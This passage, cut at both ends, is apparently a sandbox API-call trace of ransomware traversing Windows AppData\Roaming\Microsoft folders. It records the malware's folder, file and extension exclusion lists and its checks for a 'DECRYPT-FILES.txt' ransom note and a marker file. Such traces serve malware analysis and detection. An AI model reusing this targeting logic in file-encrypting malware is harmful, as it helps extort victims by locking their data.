HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\0a16c9.tmp" [0180.548] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\xlstart\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.548] CloseHandle (hObject=0x0) returned 0 [0180.548] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.548] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa8f5220, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa8f5220, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.548] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.548] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa8f5220, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa8f5220, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.548] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0180.549] CloseHandle (hObject=0x274) returned 1 [0180.549] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd01394e0, ftCreationTime.dwHighDateTime=0x1d301bc, ftLastAccessTime.dwLowDateTime=0xaa8f5220, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa8f5220, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART\\", cAlternateFileName="")) returned 0 [0180.549] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.549] CloseHandle (hObject=0x26c) returned 1 [0180.549] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IME12", cAlternateFileName="")) returned 1 [0180.549] lstrcmpW (lpString1="IME12", lpString2=".") returned 1 [0180.549] lstrcmpW (lpString1="IME12", lpString2="..") returned 1 [0180.549] lstrcatW (in: lpString1="IME12", lpString2="\\" | out: lpString1="IME12\\") returned="IME12\\" [0180.549] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="IME12\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\" [0180.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\Program Files") returned 0x0 [0180.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch=":\\Windows") returned 0x0 [0180.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\Games\\") returned 0x0 [0180.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\All Users") returned 0x0 [0180.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="AhnLab") returned 0x0 [0180.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.549] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\") returned 62 [0180.549] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.549] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\\\0a16c9.tmp") returned 73 [0180.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ime12\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.550] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\") returned 62 [0180.551] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.551] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\\\DECRYPT-FILES.txt") returned 80 [0180.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ime12\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.551] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\") returned 62 [0180.551] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\*" [0180.551] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xeebe5680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebe5680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.551] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.551] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xeebe5680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebe5680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.551] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.551] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.551] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeebe5680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeebe5680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebe5680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.551] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.551] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.551] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.551] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.551] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.551] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.551] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.551] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.551] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.551] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.551] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.551] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.551] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.551] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.551] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.551] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\") returned 62 [0180.551] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.552] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\" [0180.552] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\0a16c9.tmp" [0180.552] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.552] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ime12\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.552] CloseHandle (hObject=0x0) returned 0 [0180.552] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.552] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa91b380, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.552] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.552] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa91b380, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.552] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.552] CloseHandle (hObject=0x26c) returned 1 [0180.553] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP12", cAlternateFileName="")) returned 1 [0180.553] lstrcmpW (lpString1="IMJP12", lpString2=".") returned 1 [0180.553] lstrcmpW (lpString1="IMJP12", lpString2="..") returned 1 [0180.553] lstrcatW (in: lpString1="IMJP12", lpString2="\\" | out: lpString1="IMJP12\\") returned="IMJP12\\" [0180.553] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="IMJP12\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\" [0180.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\Program Files") returned 0x0 [0180.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch=":\\Windows") returned 0x0 [0180.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\Games\\") returned 0x0 [0180.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\All Users") returned 0x0 [0180.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="AhnLab") returned 0x0 [0180.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.553] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\") returned 63 [0180.553] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.553] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\\\0a16c9.tmp") returned 74 [0180.553] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp12\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.554] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\") returned 63 [0180.554] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.554] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\\\DECRYPT-FILES.txt") returned 81 [0180.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp12\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.554] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\") returned 63 [0180.554] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\*" [0180.554] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xeebe5680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebe5680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.554] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.554] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xeebe5680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebe5680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.554] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.554] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.554] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeebe5680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeebe5680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebe5680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.554] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.554] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.554] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.554] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.554] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.554] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.554] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.554] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.554] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.554] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.554] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.554] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.554] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.554] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.555] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.555] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\") returned 63 [0180.555] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.555] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\" [0180.555] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\0a16c9.tmp" [0180.555] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.555] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp12\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.555] CloseHandle (hObject=0x0) returned 0 [0180.555] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.555] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa91b380, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.555] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.555] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa91b380, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.555] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.555] CloseHandle (hObject=0x26c) returned 1 [0180.556] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, 